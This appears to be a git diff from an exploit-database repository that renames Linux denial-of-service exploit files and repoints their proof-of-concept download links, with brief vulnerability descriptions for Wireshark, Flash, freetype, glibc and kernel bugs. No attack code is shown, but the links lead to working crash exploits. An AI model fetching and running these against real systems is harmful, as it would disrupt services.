exploits/linux/dos/36388.py diff --git a/platforms/linux/dos/36404.c b/exploits/linux/dos/36404.c similarity index 100% rename from platforms/linux/dos/36404.c rename to exploits/linux/dos/36404.c diff --git a/platforms/linux/dos/36425.txt b/exploits/linux/dos/36425.txt similarity index 100% rename from platforms/linux/dos/36425.txt rename to exploits/linux/dos/36425.txt diff --git a/platforms/linux/dos/36545.txt b/exploits/linux/dos/36545.txt similarity index 100% rename from platforms/linux/dos/36545.txt rename to exploits/linux/dos/36545.txt diff --git a/platforms/linux/dos/36633.txt b/exploits/linux/dos/36633.txt similarity index 91% rename from platforms/linux/dos/36633.txt rename to exploits/linux/dos/36633.txt index bab45ed0d..e950c5441 100644 --- a/platforms/linux/dos/36633.txt +++ b/exploits/linux/dos/36633.txt @@ -6,4 +6,4 @@ Remote attackers can exploit these issues to execute arbitrary code in the conte Wireshark versions 1.4.0 through 1.4.10 and 1.6.0 through 1.6.4 are vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36633.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/36633.zip \ No newline at end of file diff --git a/platforms/linux/dos/36669.txt b/exploits/linux/dos/36669.txt similarity index 86% rename from platforms/linux/dos/36669.txt rename to exploits/linux/dos/36669.txt index 2a8e489e4..001dd1f7a 100644 --- a/platforms/linux/dos/36669.txt +++ b/exploits/linux/dos/36669.txt @@ -4,4 +4,4 @@ Apache APR is prone to a denial-of-service vulnerability. An attacker can exploit this issue by sending specially crafted forms in HTTP POST requests. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36669.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/36669.zip \ No newline at end of file diff --git a/platforms/linux/dos/36743.c b/exploits/linux/dos/36743.c similarity index 100% rename from platforms/linux/dos/36743.c rename to exploits/linux/dos/36743.c diff --git a/platforms/linux/dos/36906.txt b/exploits/linux/dos/36906.txt similarity index 100% rename from platforms/linux/dos/36906.txt rename to exploits/linux/dos/36906.txt diff --git a/platforms/linux/dos/370.c b/exploits/linux/dos/370.c similarity index 100% rename from platforms/linux/dos/370.c rename to exploits/linux/dos/370.c diff --git a/platforms/linux/dos/37036.txt b/exploits/linux/dos/37036.txt similarity index 100% rename from platforms/linux/dos/37036.txt rename to exploits/linux/dos/37036.txt diff --git a/platforms/linux/dos/37051.c b/exploits/linux/dos/37051.c similarity index 100% rename from platforms/linux/dos/37051.c rename to exploits/linux/dos/37051.c diff --git a/platforms/linux/dos/371.c b/exploits/linux/dos/371.c similarity index 100% rename from platforms/linux/dos/371.c rename to exploits/linux/dos/371.c diff --git a/platforms/linux/dos/37249.py b/exploits/linux/dos/37249.py similarity index 100% rename from platforms/linux/dos/37249.py rename to exploits/linux/dos/37249.py diff --git a/platforms/linux/dos/37306.txt b/exploits/linux/dos/37306.txt similarity index 100% rename from platforms/linux/dos/37306.txt rename to exploits/linux/dos/37306.txt diff --git a/platforms/linux/dos/37477.txt b/exploits/linux/dos/37477.txt similarity index 100% rename from platforms/linux/dos/37477.txt rename to exploits/linux/dos/37477.txt diff --git a/platforms/linux/dos/37538.py b/exploits/linux/dos/37538.py similarity index 100% rename from platforms/linux/dos/37538.py rename to exploits/linux/dos/37538.py diff --git a/platforms/linux/dos/37546.pl b/exploits/linux/dos/37546.pl similarity index 100% rename from platforms/linux/dos/37546.pl rename to exploits/linux/dos/37546.pl diff --git a/platforms/linux/dos/37663.txt b/exploits/linux/dos/37663.txt similarity index 100% rename from platforms/linux/dos/37663.txt rename to exploits/linux/dos/37663.txt diff --git a/platforms/linux/dos/3769.c b/exploits/linux/dos/3769.c similarity index 100% rename from platforms/linux/dos/3769.c rename to exploits/linux/dos/3769.c diff --git a/platforms/linux/dos/37706.txt b/exploits/linux/dos/37706.txt similarity index 100% rename from platforms/linux/dos/37706.txt rename to exploits/linux/dos/37706.txt diff --git a/platforms/linux/dos/37743.pl b/exploits/linux/dos/37743.pl similarity index 100% rename from platforms/linux/dos/37743.pl rename to exploits/linux/dos/37743.pl diff --git a/platforms/linux/dos/37759.py b/exploits/linux/dos/37759.py similarity index 100% rename from platforms/linux/dos/37759.py rename to exploits/linux/dos/37759.py diff --git a/platforms/linux/dos/37777.txt b/exploits/linux/dos/37777.txt similarity index 100% rename from platforms/linux/dos/37777.txt rename to exploits/linux/dos/37777.txt diff --git a/platforms/linux/dos/37783.c b/exploits/linux/dos/37783.c similarity index 100% rename from platforms/linux/dos/37783.c rename to exploits/linux/dos/37783.c diff --git a/platforms/linux/dos/37839.txt b/exploits/linux/dos/37839.txt similarity index 97% rename from platforms/linux/dos/37839.txt rename to exploits/linux/dos/37839.txt index dcdef8215..4aa0595e8 100644 --- a/platforms/linux/dos/37839.txt +++ b/exploits/linux/dos/37839.txt @@ -60,4 +60,4 @@ In this case, the insertion of the OP_BRAZERO has resulted in the expected OP_CB See attached for a crash PoC for the latest Chrome/Flash on x64 linux. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37839.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37839.zip \ No newline at end of file diff --git a/platforms/linux/dos/37866.txt b/exploits/linux/dos/37866.txt similarity index 95% rename from platforms/linux/dos/37866.txt rename to exploits/linux/dos/37866.txt index 6d388e149..ad24028c5 100644 --- a/platforms/linux/dos/37866.txt +++ b/exploits/linux/dos/37866.txt @@ -33,4 +33,4 @@ If we trace through the usages of %rax, we can get to some bad writes pretty eas 0x00007f69314b882f: mov %edx,0x10(%rdi) <---- rdi written to Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37866.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37866.zip \ No newline at end of file diff --git a/platforms/linux/dos/37867.txt b/exploits/linux/dos/37867.txt similarity index 95% rename from platforms/linux/dos/37867.txt rename to exploits/linux/dos/37867.txt index 067f90691..31b19ea82 100644 --- a/platforms/linux/dos/37867.txt +++ b/exploits/linux/dos/37867.txt @@ -18,4 +18,4 @@ rax 0x7ff8000000000000 9221120237041090560 And if we look back in the assembly a bit, the wild value has come from %rbx that points to a block of wild values. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37867.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37867.zip \ No newline at end of file diff --git a/platforms/linux/dos/37869.txt b/exploits/linux/dos/37869.txt similarity index 92% rename from platforms/linux/dos/37869.txt rename to exploits/linux/dos/37869.txt index d71e1e6ed..ff2770d47 100644 --- a/platforms/linux/dos/37869.txt +++ b/exploits/linux/dos/37869.txt @@ -8,4 +8,4 @@ rcx 0x3102ffffecfd 53888954658045 The base sample from which this fuzz case was generated is also attached. We believe this may be related to button handling. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37869.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37869.zip \ No newline at end of file diff --git a/platforms/linux/dos/37870.txt b/exploits/linux/dos/37870.txt similarity index 95% rename from platforms/linux/dos/37870.txt rename to exploits/linux/dos/37870.txt index 898f1b2d6..fdc0e180c 100644 --- a/platforms/linux/dos/37870.txt +++ b/exploits/linux/dos/37870.txt @@ -21,4 +21,4 @@ The wider context shows that the wild pointer target can be incremented with thi The base sample from which this fuzz case was generated is also attached, e3f87b25c25db8f9ec3c975f8c1211cc.swf Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37870.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37870.zip \ No newline at end of file diff --git a/platforms/linux/dos/37897.html b/exploits/linux/dos/37897.html similarity index 100% rename from platforms/linux/dos/37897.html rename to exploits/linux/dos/37897.html diff --git a/platforms/linux/dos/38.pl b/exploits/linux/dos/38.pl similarity index 100% rename from platforms/linux/dos/38.pl rename to exploits/linux/dos/38.pl diff --git a/platforms/linux/dos/3807.c b/exploits/linux/dos/3807.c similarity index 100% rename from platforms/linux/dos/3807.c rename to exploits/linux/dos/3807.c diff --git a/platforms/linux/dos/38132.py b/exploits/linux/dos/38132.py similarity index 100% rename from platforms/linux/dos/38132.py rename to exploits/linux/dos/38132.py diff --git a/platforms/linux/dos/38145.txt b/exploits/linux/dos/38145.txt similarity index 100% rename from platforms/linux/dos/38145.txt rename to exploits/linux/dos/38145.txt diff --git a/platforms/linux/dos/38365.txt b/exploits/linux/dos/38365.txt similarity index 100% rename from platforms/linux/dos/38365.txt rename to exploits/linux/dos/38365.txt diff --git a/platforms/linux/dos/38392.txt b/exploits/linux/dos/38392.txt similarity index 100% rename from platforms/linux/dos/38392.txt rename to exploits/linux/dos/38392.txt diff --git a/platforms/linux/dos/38421.txt b/exploits/linux/dos/38421.txt similarity index 100% rename from platforms/linux/dos/38421.txt rename to exploits/linux/dos/38421.txt diff --git a/platforms/linux/dos/38422.txt b/exploits/linux/dos/38422.txt similarity index 100% rename from platforms/linux/dos/38422.txt rename to exploits/linux/dos/38422.txt diff --git a/platforms/linux/dos/38465.txt b/exploits/linux/dos/38465.txt similarity index 100% rename from platforms/linux/dos/38465.txt rename to exploits/linux/dos/38465.txt diff --git a/platforms/linux/dos/38589.c b/exploits/linux/dos/38589.c similarity index 100% rename from platforms/linux/dos/38589.c rename to exploits/linux/dos/38589.c diff --git a/platforms/linux/dos/38620.txt b/exploits/linux/dos/38620.txt similarity index 97% rename from platforms/linux/dos/38620.txt rename to exploits/linux/dos/38620.txt index 35660395b..45f963a1a 100644 --- a/platforms/linux/dos/38620.txt +++ b/exploits/linux/dos/38620.txt @@ -79,4 +79,4 @@ The other crashes occur at freetype2/src/sfnt/ttcmap.c:3012:29. The issue was reported in https://savannah.nongnu.org/bugs/index.php?46346. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38620.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38620.zip \ No newline at end of file diff --git a/platforms/linux/dos/38622.txt b/exploits/linux/dos/38622.txt similarity index 100% rename from platforms/linux/dos/38622.txt rename to exploits/linux/dos/38622.txt diff --git a/platforms/linux/dos/38681.py b/exploits/linux/dos/38681.py similarity index 100% rename from platforms/linux/dos/38681.py rename to exploits/linux/dos/38681.py diff --git a/platforms/linux/dos/38685.py b/exploits/linux/dos/38685.py similarity index 100% rename from platforms/linux/dos/38685.py rename to exploits/linux/dos/38685.py diff --git a/platforms/linux/dos/38778.txt b/exploits/linux/dos/38778.txt similarity index 67% rename from platforms/linux/dos/38778.txt rename to exploits/linux/dos/38778.txt index 7ef36dc6d..24cf2e59e 100644 --- a/platforms/linux/dos/38778.txt +++ b/exploits/linux/dos/38778.txt @@ -4,4 +4,4 @@ Blue Coat ProxySG and Security Gateway OS are prone to a denial-of-service vulne Successful exploits may allow an attacker to consume excessive resources, denying service to legitimate users. -https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/thc-ssl-dos-1.4.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/thc-ssl-dos-1.4.tar.gz \ No newline at end of file diff --git a/platforms/linux/dos/38854.sh b/exploits/linux/dos/38854.sh similarity index 100% rename from platforms/linux/dos/38854.sh rename to exploits/linux/dos/38854.sh diff --git a/platforms/linux/dos/38857.txt b/exploits/linux/dos/38857.txt similarity index 100% rename from platforms/linux/dos/38857.txt rename to exploits/linux/dos/38857.txt diff --git a/platforms/linux/dos/38909.txt b/exploits/linux/dos/38909.txt similarity index 100% rename from platforms/linux/dos/38909.txt rename to exploits/linux/dos/38909.txt diff --git a/platforms/linux/dos/39229.cpp b/exploits/linux/dos/39229.cpp similarity index 95% rename from platforms/linux/dos/39229.cpp rename to exploits/linux/dos/39229.cpp index e2d2b8afa..9b9d18672 100644 --- a/platforms/linux/dos/39229.cpp +++ b/exploits/linux/dos/39229.cpp @@ -54,7 +54,7 @@ using namespace std; * $ g++ -I/usr/include/gdcm-2.6 -o CVE-2015-8396-trigger CVE-2015-8396-trigger.cpp -lgdcmCommon -lgdcmMSFF -lgdcmDSED * * Try it on http://census-labs.com/media/CVE-2015-8396.dcm.bz2 - * https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39229.zip + * https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39229.zip * $ bzip2 -d CVE-2015-8396.dcm.bz2 * $ ./CVE-2015-8396-trigger CVE-2015-8396.dcm */ diff --git a/platforms/linux/dos/39308.c b/exploits/linux/dos/39308.c similarity index 100% rename from platforms/linux/dos/39308.c rename to exploits/linux/dos/39308.c diff --git a/platforms/linux/dos/39406.py b/exploits/linux/dos/39406.py similarity index 100% rename from platforms/linux/dos/39406.py rename to exploits/linux/dos/39406.py diff --git a/platforms/linux/dos/39445.c b/exploits/linux/dos/39445.c similarity index 100% rename from platforms/linux/dos/39445.c rename to exploits/linux/dos/39445.c diff --git a/platforms/linux/dos/3945.rb b/exploits/linux/dos/3945.rb similarity index 100% rename from platforms/linux/dos/3945.rb rename to exploits/linux/dos/3945.rb diff --git a/platforms/linux/dos/39454.txt b/exploits/linux/dos/39454.txt similarity index 96% rename from platforms/linux/dos/39454.txt rename to exploits/linux/dos/39454.txt index 80c4fadd1..d7bc20212 100644 --- a/platforms/linux/dos/39454.txt +++ b/exploits/linux/dos/39454.txt @@ -30,4 +30,4 @@ installation and use of the POC code. Proof of Concept: https://github.com/fjserna/CVE-2015-7547/archive/master.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39454-1.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39454-1.zip \ No newline at end of file diff --git a/platforms/linux/dos/39491.txt b/exploits/linux/dos/39491.txt similarity index 97% rename from platforms/linux/dos/39491.txt rename to exploits/linux/dos/39491.txt index bc72813f4..7daaf97cf 100644 --- a/platforms/linux/dos/39491.txt +++ b/exploits/linux/dos/39491.txt @@ -78,4 +78,4 @@ The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758605. Att Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39491.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39491.zip \ No newline at end of file diff --git a/platforms/linux/dos/39492.txt b/exploits/linux/dos/39492.txt similarity index 97% rename from platforms/linux/dos/39492.txt rename to exploits/linux/dos/39492.txt index fbdbf0102..e9f192cfe 100644 --- a/platforms/linux/dos/39492.txt +++ b/exploits/linux/dos/39492.txt @@ -81,4 +81,4 @@ The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758589. Att Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39492.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39492.zip \ No newline at end of file diff --git a/platforms/linux/dos/39493.txt b/exploits/linux/dos/39493.txt similarity index 97% rename from platforms/linux/dos/39493.txt rename to exploits/linux/dos/39493.txt index 7f7a13548..2d1353832 100644 --- a/platforms/linux/dos/39493.txt +++ b/exploits/linux/dos/39493.txt @@ -64,4 +64,4 @@ The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758588. Att Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39493.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39493.zip \ No newline at end of file diff --git a/platforms/linux/dos/39494.txt b/exploits/linux/dos/39494.txt similarity index 97% rename from platforms/linux/dos/39494.txt rename to exploits/linux/dos/39494.txt index 2c2c76b27..08968cfdd 100644 --- a/platforms/linux/dos/39494.txt +++ b/exploits/linux/dos/39494.txt @@ -74,4 +74,4 @@ The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758606. Att Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39494.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39494.zip \ No newline at end of file diff --git a/platforms/linux/dos/39502.py b/exploits/linux/dos/39502.py similarity index 100% rename from platforms/linux/dos/39502.py rename to exploits/linux/dos/39502.py diff --git a/platforms/linux/dos/39505.c b/exploits/linux/dos/39505.c similarity index 100% rename from platforms/linux/dos/39505.c rename to exploits/linux/dos/39505.c diff --git a/platforms/linux/dos/39537.txt b/exploits/linux/dos/39537.txt similarity index 100% rename from platforms/linux/dos/39537.txt rename to exploits/linux/dos/39537.txt diff --git a/platforms/linux/dos/39538.txt b/exploits/linux/dos/39538.txt similarity index 100% rename from platforms/linux/dos/39538.txt rename to exploits/linux/dos/39538.txt diff --git a/platforms/linux/dos/39539.txt b/exploits/linux/dos/39539.txt similarity index 100% rename from platforms/linux/dos/39539.txt rename to exploits/linux/dos/39539.txt diff --git a/platforms/linux/dos/39540.txt b/exploits/linux/dos/39540.txt similarity index 100% rename from platforms/linux/dos/39540.txt rename to exploits/linux/dos/39540.txt diff --git a/platforms/linux/dos/39541.txt b/exploits/linux/dos/39541.txt similarity index 100% rename from platforms/linux/dos/39541.txt rename to exploits/linux/dos/39541.txt diff --git a/platforms/linux/dos/39542.txt b/exploits/linux/dos/39542.txt similarity index 100% rename from platforms/linux/dos/39542.txt rename to exploits/linux/dos/39542.txt diff --git a/platforms/linux/dos/39543.txt b/exploits/linux/dos/39543.txt similarity index 100% rename from platforms/linux/dos/39543.txt rename to exploits/linux/dos/39543.txt diff --git a/platforms/linux/dos/39544.txt b/exploits/linux/dos/39544.txt similarity index 100% rename from platforms/linux/dos/39544.txt rename to exploits/linux/dos/39544.txt diff --git a/platforms/linux/dos/39545.txt b/exploits/linux/dos/39545.txt similarity index 97% rename from platforms/linux/dos/39545.txt rename to exploits/linux/dos/39545.txt index 51a1cfdff..bf57db5c5 100644 --- a/platforms/linux/dos/39545.txt +++ b/exploits/linux/dos/39545.txt @@ -19,4 +19,4 @@ Correction: IPT_SO_SET_REPLACE is reached via setsockopt, not ioctl! Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39545.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39545.zip \ No newline at end of file diff --git a/platforms/linux/dos/39555.txt b/exploits/linux/dos/39555.txt similarity index 100% rename from platforms/linux/dos/39555.txt rename to exploits/linux/dos/39555.txt diff --git a/platforms/linux/dos/39556.txt b/exploits/linux/dos/39556.txt similarity index 100% rename from platforms/linux/dos/39556.txt rename to exploits/linux/dos/39556.txt diff --git a/platforms/linux/dos/39638.txt b/exploits/linux/dos/39638.txt similarity index 96% rename from platforms/linux/dos/39638.txt rename to exploits/linux/dos/39638.txt index 99eac710d..ab05f8237 100644 --- a/platforms/linux/dos/39638.txt +++ b/exploits/linux/dos/39638.txt @@ -69,4 +69,4 @@ Public Advisory: March 30th, 2016 Proof of Concept: https://census-labs.com/media/seas-trigger.packet -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39638.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39638.zip \ No newline at end of file diff --git a/platforms/linux/dos/39733.py b/exploits/linux/dos/39733.py similarity index 100% rename from platforms/linux/dos/39733.py rename to exploits/linux/dos/39733.py diff --git a/platforms/linux/dos/39747.py b/exploits/linux/dos/39747.py similarity index 100% rename from platforms/linux/dos/39747.py rename to exploits/linux/dos/39747.py diff --git a/platforms/linux/dos/39773.txt b/exploits/linux/dos/39773.txt similarity index 97% rename from platforms/linux/dos/39773.txt rename to exploits/linux/dos/39773.txt index 0849989b5..d3aeb9dcf 100644 --- a/platforms/linux/dos/39773.txt +++ b/exploits/linux/dos/39773.txt @@ -78,4 +78,4 @@ Fixed in https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39773.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39773.zip \ No newline at end of file diff --git a/platforms/linux/dos/39800.txt b/exploits/linux/dos/39800.txt similarity index 100% rename from platforms/linux/dos/39800.txt rename to exploits/linux/dos/39800.txt diff --git a/platforms/linux/dos/39842.txt b/exploits/linux/dos/39842.txt similarity index 100% rename from platforms/linux/dos/39842.txt rename to exploits/linux/dos/39842.txt diff --git a/platforms/linux/dos/39873.py b/exploits/linux/dos/39873.py similarity index 100% rename from platforms/linux/dos/39873.py rename to exploits/linux/dos/39873.py diff --git a/platforms/linux/dos/39875.py b/exploits/linux/dos/39875.py similarity index 100% rename from platforms/linux/dos/39875.py rename to exploits/linux/dos/39875.py diff --git a/platforms/linux/dos/39939.rb b/exploits/linux/dos/39939.rb similarity index 100% rename from platforms/linux/dos/39939.rb rename to exploits/linux/dos/39939.rb diff --git a/platforms/linux/dos/39940.txt b/exploits/linux/dos/39940.txt similarity index 98% rename from platforms/linux/dos/39940.txt rename to exploits/linux/dos/39940.txt index 42a1744d3..3603c9b3a 100644 --- a/platforms/linux/dos/39940.txt +++ b/exploits/linux/dos/39940.txt @@ -101,4 +101,4 @@ Attached are six proof of concept PDF files: three derived from an original file Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39940.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39940.zip \ No newline at end of file diff --git a/platforms/linux/dos/39941.txt b/exploits/linux/dos/39941.txt similarity index 98% rename from platforms/linux/dos/39941.txt rename to exploits/linux/dos/39941.txt index 4b0f0b526..a9f926300 100644 --- a/platforms/linux/dos/39941.txt +++ b/exploits/linux/dos/39941.txt @@ -109,4 +109,4 @@ Attached is a proof of concept PDF file. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39941.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39941.zip \ No newline at end of file diff --git a/platforms/linux/dos/39942.txt b/exploits/linux/dos/39942.txt similarity index 98% rename from platforms/linux/dos/39942.txt rename to exploits/linux/dos/39942.txt index e7d7f4e96..38113323d 100644 --- a/platforms/linux/dos/39942.txt +++ b/exploits/linux/dos/39942.txt @@ -115,4 +115,4 @@ Attached is a proof of concept PDF file. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39942.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39942.zip \ No newline at end of file diff --git a/platforms/linux/dos/39943.txt b/exploits/linux/dos/39943.txt similarity index 98% rename from platforms/linux/dos/39943.txt rename to exploits/linux/dos/39943.txt index 54643a8bc..0bb076816 100644 --- a/platforms/linux/dos/39943.txt +++ b/exploits/linux/dos/39943.txt @@ -119,4 +119,4 @@ Attached is a proof of concept PDF file. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39943.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39943.zip \ No newline at end of file diff --git a/platforms/linux/dos/39944.txt b/exploits/linux/dos/39944.txt similarity index 98% rename from platforms/linux/dos/39944.txt rename to exploits/linux/dos/39944.txt index 8fe855848..6ad6b819e 100644 --- a/platforms/linux/dos/39944.txt +++ b/exploits/linux/dos/39944.txt @@ -154,4 +154,4 @@ Attached are three further files which reproduce the crash (note that MALLOC_CHE Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39944.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39944.zip \ No newline at end of file diff --git a/platforms/linux/dos/39961.txt b/exploits/linux/dos/39961.txt similarity index 97% rename from platforms/linux/dos/39961.txt rename to exploits/linux/dos/39961.txt index 9791bcb7f..102036e5e 100644 --- a/platforms/linux/dos/39961.txt +++ b/exploits/linux/dos/39961.txt @@ -161,4 +161,4 @@ Updated POC to work on the latest asan linux build, command buffer ids were out Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39961.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39961.zip \ No newline at end of file diff --git a/platforms/linux/dos/39986.py b/exploits/linux/dos/39986.py similarity index 100% rename from platforms/linux/dos/39986.py rename to exploits/linux/dos/39986.py diff --git a/platforms/linux/dos/40181.c b/exploits/linux/dos/40181.c similarity index 100% rename from platforms/linux/dos/40181.c rename to exploits/linux/dos/40181.c diff --git a/platforms/linux/dos/40230.txt b/exploits/linux/dos/40230.txt similarity index 100% rename from platforms/linux/dos/40230.txt rename to exploits/linux/dos/40230.txt diff --git a/platforms/linux/dos/40291.txt b/exploits/linux/dos/40291.txt similarity index 91% rename from platforms/linux/dos/40291.txt rename to exploits/linux/dos/40291.txt index ad3f4d774..3c6821a32 100644 --- a/platforms/linux/dos/40291.txt +++ b/exploits/linux/dos/40291.txt @@ -6,7 +6,7 @@ # CVE: CVE-2016-6855 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40291.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40291.zip Reported: 19-August-2016 diff --git a/platforms/linux/dos/40419.c b/exploits/linux/dos/40419.c similarity index 100% rename from platforms/linux/dos/40419.c rename to exploits/linux/dos/40419.c diff --git a/platforms/linux/dos/40695.c b/exploits/linux/dos/40695.c similarity index 100% rename from platforms/linux/dos/40695.c rename to exploits/linux/dos/40695.c diff --git a/platforms/linux/dos/40696.c b/exploits/linux/dos/40696.c similarity index 100% rename from platforms/linux/dos/40696.c rename to exploits/linux/dos/40696.c diff --git a/platforms/linux/dos/40697.c b/exploits/linux/dos/40697.c similarity index 100% rename from platforms/linux/dos/40697.c rename to exploits/linux/dos/40697.c diff --git a/platforms/linux/dos/40731.c b/exploits/linux/dos/40731.c similarity index 100% rename from platforms/linux/dos/40731.c rename to exploits/linux/dos/40731.c diff --git a/platforms/linux/dos/40762.c b/exploits/linux/dos/40762.c similarity index 100% rename from platforms/linux/dos/40762.c rename to exploits/linux/dos/40762.c diff --git a/platforms/linux/dos/40790.txt b/exploits/linux/dos/40790.txt similarity index 100% rename from platforms/linux/dos/40790.txt rename to exploits/linux/dos/40790.txt diff --git a/platforms/linux/dos/40806.py b/exploits/linux/dos/40806.py similarity index 100% rename from platforms/linux/dos/40806.py rename to exploits/linux/dos/40806.py diff --git a/platforms/linux/dos/40819.c b/exploits/linux/dos/40819.c similarity index 100% rename from platforms/linux/dos/40819.c rename to exploits/linux/dos/40819.c diff --git a/platforms/linux/dos/40840.py b/exploits/linux/dos/40840.py similarity index 100% rename from platforms/linux/dos/40840.py rename to exploits/linux/dos/40840.py diff --git a/platforms/linux/dos/40866.py b/exploits/linux/dos/40866.py similarity index 100% rename from platforms/linux/dos/40866.py rename to exploits/linux/dos/40866.py diff --git a/platforms/linux/dos/40888.py b/exploits/linux/dos/40888.py similarity index 100% rename from platforms/linux/dos/40888.py rename to exploits/linux/dos/40888.py diff --git a/platforms/linux/dos/40899.py b/exploits/linux/dos/40899.py similarity index 100% rename from platforms/linux/dos/40899.py rename to exploits/linux/dos/40899.py diff --git a/platforms/linux/dos/40909.py b/exploits/linux/dos/40909.py similarity index 100% rename from platforms/linux/dos/40909.py rename to exploits/linux/dos/40909.py diff --git a/platforms/linux/dos/40928.py b/exploits/linux/dos/40928.py similarity index 100% rename from platforms/linux/dos/40928.py rename to exploits/linux/dos/40928.py diff --git a/platforms/linux/dos/40985.txt b/exploits/linux/dos/40985.txt similarity index 100% rename from platforms/linux/dos/40985.txt rename to exploits/linux/dos/40985.txt diff --git a/platforms/linux/dos/41350.c b/exploits/linux/dos/41350.c similarity index 100% rename from platforms/linux/dos/41350.c rename to exploits/linux/dos/41350.c diff --git a/platforms/linux/dos/41457.c b/exploits/linux/dos/41457.c similarity index 100% rename from platforms/linux/dos/41457.c rename to exploits/linux/dos/41457.c diff --git a/platforms/linux/dos/41715.txt b/exploits/linux/dos/41715.txt similarity index 100% rename from platforms/linux/dos/41715.txt rename to exploits/linux/dos/41715.txt diff --git a/platforms/linux/dos/41767.txt b/exploits/linux/dos/41767.txt similarity index 100% rename from platforms/linux/dos/41767.txt rename to exploits/linux/dos/41767.txt diff --git a/platforms/linux/dos/41768.txt b/exploits/linux/dos/41768.txt similarity index 100% rename from platforms/linux/dos/41768.txt rename to exploits/linux/dos/41768.txt diff --git a/platforms/linux/dos/41769.txt b/exploits/linux/dos/41769.txt similarity index 100% rename from platforms/linux/dos/41769.txt rename to exploits/linux/dos/41769.txt diff --git a/platforms/linux/dos/41781.c b/exploits/linux/dos/41781.c similarity index 100% rename from platforms/linux/dos/41781.c rename to exploits/linux/dos/41781.c diff --git a/platforms/linux/dos/41893.txt b/exploits/linux/dos/41893.txt similarity index 100% rename from platforms/linux/dos/41893.txt rename to exploits/linux/dos/41893.txt diff --git a/platforms/linux/dos/41898.txt b/exploits/linux/dos/41898.txt similarity index 100% rename from platforms/linux/dos/41898.txt rename to exploits/linux/dos/41898.txt diff --git a/platforms/linux/dos/41974.rb b/exploits/linux/dos/41974.rb similarity index 100% rename from platforms/linux/dos/41974.rb rename to exploits/linux/dos/41974.rb diff --git a/platforms/linux/dos/41991.py b/exploits/linux/dos/41991.py similarity index 100% rename from platforms/linux/dos/41991.py rename to exploits/linux/dos/41991.py diff --git a/platforms/linux/dos/42048.c b/exploits/linux/dos/42048.c similarity index 100% 